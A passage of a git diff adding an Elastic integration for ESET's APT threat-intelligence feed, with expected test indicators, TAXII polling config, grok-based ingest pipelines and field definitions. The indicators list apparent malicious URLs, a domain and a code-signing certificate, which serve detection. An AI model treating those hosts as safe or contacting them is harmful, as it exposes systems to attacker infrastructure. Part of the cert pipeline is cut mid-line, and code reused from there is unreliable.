\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--6602ac29-0cb3-4da9-b2dc-091b8a01ebfc\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"url\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T13:16:00.000Z\", \"pattern\": \"[url:value = 'https://billyconsult.com/wp-media.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/wp-media.php' AND url:x_misp_port = '443']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2022-03-26T00:00:00Z\", \"valid_until\": \"2023-09-29T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T13:16:00.000Z", + "modified_at": "2023-10-02T13:16:00.000Z", + "provider": "eset", + "type": "url", + "url": { + "original": "https://billyconsult.com/wp-media.php", + "path": "/wp-media.php", + "port": 443, + "scheme": "https" + } + } + } + }, + { + "@timestamp": "2023-10-02T15:42:54.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a013b792-6735-4ae4-ad1a-6ecfa9b1d216", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2024-10-01T15:42:54.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T15:42:54.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--a013b792-6735-4ae4-ad1a-6ecfa9b1d216\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T15:42:54.000Z\", \"pattern\": \"[domain-name:value = 'brianrep.com' AND domain-name:value = 'brianrep.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-05-05T00:00:00Z\", \"valid_until\": \"2023-09-28T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T15:42:54.000Z", + "modified_at": "2023-10-02T15:42:54.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "brianrep.com" + } + } + } + }, + { + "@timestamp": "2023-10-02T15:46:12.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e8d72126-34cd-4ef0-ad5f-b5d449e5a5e3", + "meta_category": "network", + "name": "url", + "valid_until": "2024-10-01T15:46:12.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T15:46:12.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--e8d72126-34cd-4ef0-ad5f-b5d449e5a5e3\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"url\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T15:46:12.000Z\", \"pattern\": \"[url:value = 'https://brianrep.com/dnquery.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/dnquery.php' AND url:x_misp_port = '443']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-05-05T00:00:00Z\", \"valid_until\": \"2023-09-28T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T15:46:12.000Z", + "modified_at": "2023-10-02T15:46:12.000Z", + "provider": "eset", + "type": "url", + "url": { + "original": "https://brianrep.com/dnquery.php", + "path": "/dnquery.php", + "port": 443, + "scheme": "https" + } + } + } + }, + { + "@timestamp": "2023-10-02T12:10:47.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c079b60b-dd07-4c3c-b9b8-63573708bcdc", + "meta_category": "network", + "name": "x509", + "valid_until": "2024-10-01T12:10:47.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T12:10:47.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--c079b60b-dd07-4c3c-b9b8-63573708bcdc\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"x509\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T12:10:47.000Z\", \"pattern\": \"[x509-certificate:hashes.MD5 = '0a2fd4d1cdc852678a40cbccfd4b7fbd' AND x509-certificate:hashes.SHA1 = 'f23372e12d37178544acd7448f469ccaf71ad244' AND x509-certificate:hashes.SHA256 = '472b1939ed7df19bad95512e63ca44aac4d95a7109d31f98a042e45c37a5a630' AND x509-certificate:issuer = 'C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Extended Validation Code Signing CA' AND x509-certificate:serial_number = '00c74f79c78393ebf22858e9ad3914567f' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'serialNumber=SC331902, ??=GB, ??=Private Organization, C=GB, postalCode=ML12 6HQ, ST=Scottish Borders, L=Broughton, ??=Galavale, O=SimpleHelp Ltd, CN=SimpleHelp Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-02-25 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-02-25 00:00:00+00:00']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-10-02T12:10:47Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "0a2fd4d1cdc852678a40cbccfd4b7fbd", + "sha1": "f23372e12d37178544acd7448f469ccaf71ad244", + "sha256": "472b1939ed7df19bad95512e63ca44aac4d95a7109d31f98a042e45c37a5a630" + } + }, + "last_seen": "2023-10-02T12:10:47.000Z", + "modified_at": "2023-10-02T12:10:47.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "COMODO RSA Extended Validation Code Signing CA" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Extended Validation Code Signing CA", + "locality": [ + "Salford" + ], + "organization": [ + "COMODO CA Limited" + ], + "state_or_province": [ + "Greater Manchester" + ] + }, + "not_after": "2024-02-25T23:59:59.000Z", + "not_before": "2021-02-25T00:00:00.000Z", + "serial_number": "00c74f79c78393ebf22858e9ad3914567f", + "signature_algorithm": "1.2.840.113549.1.1.11", + "subject": { + "common_name": [ + "SimpleHelp Ltd" + ], + "country": [ + "GB" + ], + "distinguished_name": "serialNumber=SC331902, ??=GB, ??=Private Organization, C=GB, postalCode=ML12 6HQ, ST=Scottish Borders, L=Broughton, ??=Galavale, O=SimpleHelp Ltd, CN=SimpleHelp Ltd", + "locality": [ + "Broughton" + ], + "organization": [ + "SimpleHelp Ltd" + ], + "state_or_province": [ + "Scottish Borders" + ] + }, + "version_number": "3" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/apt/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/apt/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..bd87152a77a --- /dev/null +++ b/packages/ti_eset/data_stream/apt/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/97e3eb74ae5f46dd9e22f677a6938ee7/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 26 diff --git a/packages/ti_eset/data_stream/apt/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/apt/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/apt/agent/stream/httpjson.yml.hbs @@ -0,0 +1,72 @@ +config_version: "2" + +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +{{/if}} + +auth.basic.user: {{username}} +auth.basic.password: {{password}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} + +request.transforms: + - set: + target: header.Content-Type + value: application/taxii+json;version=2.1 + - set: + target: header.Accept + value: application/taxii+json;version=2.1 + - set: + target: url.params.match[type] + value: indicator + - set: + target: url.params.limit + value: {{page_size}} + - set: + target: url.params.added_after + value: '[[ .cursor.timestamp ]]' + default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]' + +response.pagination: + - set: + target: url.params.added_after + value: >- + [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]] + fail_on_template_error: true + +response.split: + target: body.objects + +cursor: + timestamp: + value: >- + [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]] + ignore_empty_value: true + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/apt/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..206c1e2d1b8 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "delete": { + "actions": { + "delete": {} + }, + "min_age": "365d" + }, + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..99687e6838e --- /dev/null +++ b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,166 @@ +--- +description: Initial pipeline for parsing ETI TAXII2 feed +processors: + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - append: + field: event.category + value: threat + allow_duplicates: false + - append: + field: event.type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + value: eset + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: eti + - drop: + if: ctx.eti?.type != 'indicator' + - set: + field: threat.feed.name + value: "ESET APT stix 2.1" + - date: + field: eti.created + target_field: "@timestamp" + formats: + - "ISO8601" + if: "ctx.eti?.created != null" + - date: + field: eti.modified + target_field: threat.indicator.last_seen + formats: + - "ISO8601" + if: "ctx.eti?.modified != null" + - set: + field: threat.indicator.modified_at + copy_from: threat.indicator.last_seen + if: "ctx.threat?.indicator?.last_seen != null" + - script: + lang: painless + source: >- + if (ctx.eset == null) { + ctx.eset = new HashMap(); + } + + ctx.eset.valid_until = ZonedDateTime.parse(ctx['@timestamp']).plusDays(365); + if: "ctx['@timestamp'] != null" + + - rename: + field: eti.id + target_field: eset.id + ignore_missing: true + + - foreach: + field: eti.labels + if: ctx.eti?.labels != null + processor: + grok: + field: _ingest._value + patterns: + - "^misp:name=\"%{DATA:eset.name}\"" + - "^misp:type=\"%{DATA:eset.type}\"" + - "^misp:category=\"%{DATA:eset.category}\"" + - "^misp:meta-category=\"%{DATA:eset.meta_category}\"" + ignore_failure: true + + - set: + field: threat.indicator.type + value: x509-certificate + if: "ctx.eset?.name == 'x509'" + - set: + field: threat.indicator.type + value: domain-name + if: ctx.eset?.name != null && ctx.eset?.name.startsWith('domain') + - set: + field: threat.indicator.type + value: file + if: | + ctx.eset?.name == 'file' || + ctx.eset?.meta_category == 'file' + - set: + field: threat.indicator.type + value: url + if: ctx.eset?.name == 'url' + - set: + field: threat.indicator.type + value: email-addr + if: | + ctx.eset?.name == 'email' || + (ctx.eset?.type != null && ctx.eset?.type?.startsWith('email')) + + - split: + field: eti.pattern + target_field: eti._patterns + separator: ' AND ' + if: ctx.eti?.pattern != null + + - pipeline: + name: '{{ IngestPipeline "pipeline-file" }}' + if: ctx.threat?.indicator?.type == 'file' + - pipeline: + name: '{{ IngestPipeline "pipeline-email" }}' + if: ctx.threat?.indicator?.type == 'email-addr' + - pipeline: + name: '{{ IngestPipeline "pipeline-url" }}' + if: ctx.threat?.indicator?.type == 'url' + - pipeline: + name: '{{ IngestPipeline "pipeline-domain-ip" }}' + if: ctx.threat?.indicator?.type == 'domain-name' + - pipeline: + name: '{{ IngestPipeline "pipeline-cert" }}' + if: ctx.threat?.indicator?.type == 'x509-certificate' + - set: + field: threat.indicator.confidence + value: High + - remove: + field: + - eti + ignore_missing: true + - remove: + field: event.original + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-cert.yml b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-cert.yml new file mode 100644 index 00000000000..3358e12c81b --- /dev/null +++ b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-cert.yml @@ -0,0 +1,119 @@ +--- +description: Pipeline for processing x509 events +processors: + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[?x509-certificate:hashes.MD5%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.md5}'\\]?" + - "^\\[?x509-certificate:hashes.SHA1%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha1}'\\]?" + - "^\\[?x509-certificate:hashes.SHA256%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha256}'\\]?" + - "^\\[?x509-certificate:serial_number%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.serial_number}'\\]?" + - "^\\[?x509-certificate:signature_algorithm%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.signature_algorithm}'\\]?" + - "^\\[?x509-certificate:version%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.version_number}'\\]?" + - "^\\[?x509-certificate:validity_not_after%{SPACE}=%{SPACE}'%{TIMESTAMP_ISO8601:threat.indicator.x509.not_after}'\\]?" + - "^\\[?x509-certificate:validity_not_before%{SPACE}=%{SPACE}'%{TIMESTAMP_ISO8601:threat.indicator.x509.not_before}'\\]?" + - "^\\[?x509-certificate:issuer%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.issuer.distinguished_name}'\\]?" + - "^\\[?x509-certificate:subject%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.subject.distinguished_name}'\\]?" + ignore_failure: true + + - date: + field: threat.indicator.x509.not_after + target_field: threat.indicator.x509.not_after + formats: + - "ISO8601" + - "yyyy-MM-dd HH:mm:ssz" + if: "ctx.threat?.indicator?.x509?.not_after != null" + - date: + field: threat.indicator.x509.not_before + target_field: threat.indicator.x509.not_before + formats: + - "ISO8601" + - "yyyy-MM-dd HH:mm:ssz" + if: "ctx.threat?.indicator?.x509?.not_before != null" + + - kv: + field: threat.indicator.x509.issuer.distinguished_name + target_field: eti._issuer_fields + field_split: "(? + ctx.threat.indicator.email.address = ctx.threat.indicator.email.address.splitOnToken(' '); diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-file.yml b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-file.yml new file mode 100644 index 00000000000..60fa7fcf864 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-file.yml @@ -0,0 +1,14 @@ +--- +description: Pipeline for processing file events +processors: + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[?file:hashes.MD5%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.md5}'\\]?" + - "^\\[?file:hashes.SHA1%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha1}'\\]?" + - "^\\[?file:hashes.SHA256%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha256}'\\]?" + - "^\\[?file:name%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.name}'\\]?" + ignore_failure: true diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-url.yml b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-url.yml new file mode 100644 index 00000000000..d2119476eb9 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-url.yml @@ -0,0 +1,14 @@ +--- +description: Pipeline for processing url events +processors: + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[?url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?" + - "^\\[?url:x_misp_scheme%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.scheme}'\\]?" + - "^\\[?url:x_misp_port%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.port:int}'\\]?" + - "^\\[?url:x_misp_resource_path%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.path}'\\]?" + ignore_failure: true diff --git a/packages/ti_eset/data_stream/apt/fields/agent.yml b/packages/ti_eset/data_stream/apt/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/data_stream/apt/fields/base-fields.yml b/packages/ti_eset/data_stream/apt/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/data_stream/apt/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/data_stream/apt/fields/ecs.yml b/packages/ti_eset/data_stream/apt/fields/ecs.yml new file mode 100644 index 00000000000..5162c5f7184 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/fields/ecs.yml @@ -0,0 +1,92 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.indicator.email.address +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.file.name +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: threat.indicator.url.port +- external: ecs + name: threat.indicator.url.scheme +- external: ecs + name: threat.indicator.x509.issuer.common_name +- external: ecs + name: threat.indicator.x509.issuer.country +- external: ecs + name: threat.indicator.x509.issuer.distinguished_name +- external: ecs + name: threat.indicator.x509.issuer.locality +- external: ecs + name: threat.indicator.x509.issuer.organization +- external: ecs + name: threat.indicator.x509.issuer.state_or_province +- external: ecs + name: threat.indicator.x509.issuer.organizational_unit +- external: ecs + name: threat.indicator.x509.not_after +- external: ecs + name: threat.indicator.x509.not_before +- external: ecs + name: threat.indicator.x509.serial_number +- external: ecs + name: threat.indicator.x509.signature_algorithm +- external: ecs + name: threat.indicator.x509.subject.common_name +- external: ecs + name: threat.indicator.x509.subject.country +- external: ecs + name: threat.indicator.x509.subject.distinguished_name +- external: ecs + name: threat.indicator.x509.subject.locality +- external: ecs + name: threat.indicator.x509.subject.organization +- external: ecs + name: threat.indicator.x509.subject.state_or_province +- external: ecs + name: threat.indicator.x509.subject.organizational_unit +- external: ecs + name: threat.indicator.x509.version_number diff --git a/packages/ti_eset/data_stream/apt/fields/fields.yml b/packages/ti_eset/data_stream/apt/fields/fields.yml new file mode 100644 index 00000000000..171e23fd814 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/fields/fields.yml @@ -0,0 +1,37 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: category + type: keyword + description: > + Event category as defined by MISP. + + - name: meta_category + type: keyword + description: > + Event sub-category as defined by MISP. + + - name: name + type: keyword + description: > + Human readable name describing the event. + + - name: type + type: keyword + description: > + Type of the event. + + - name: valid_until + type: date + description: >- + Event expiration date. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/apt/lifecycle.yml b/packages/ti_eset/data_stream/apt/lifecycle.yml new file mode 100644 index 00000000000..7bd2145f9d8 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 365d diff --git a/packages/ti_eset/data_stream/apt/manifest.yml b/packages/ti_eset/data_stream/apt/manifest.yml new file mode 100644 index 00000000000..6396af9d0e7 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/manifest.yml @@ -0,0 +1,95 @@ +title: "APT" +type: logs +ilm_policy: logs-ti_eset.apt-default_policy +streams: + - input: httpjson + title: APT + description: Collect data from ETI APT feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of APT collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/97e3eb74ae5f46dd9e22f677a6938ee7/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-apt + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for 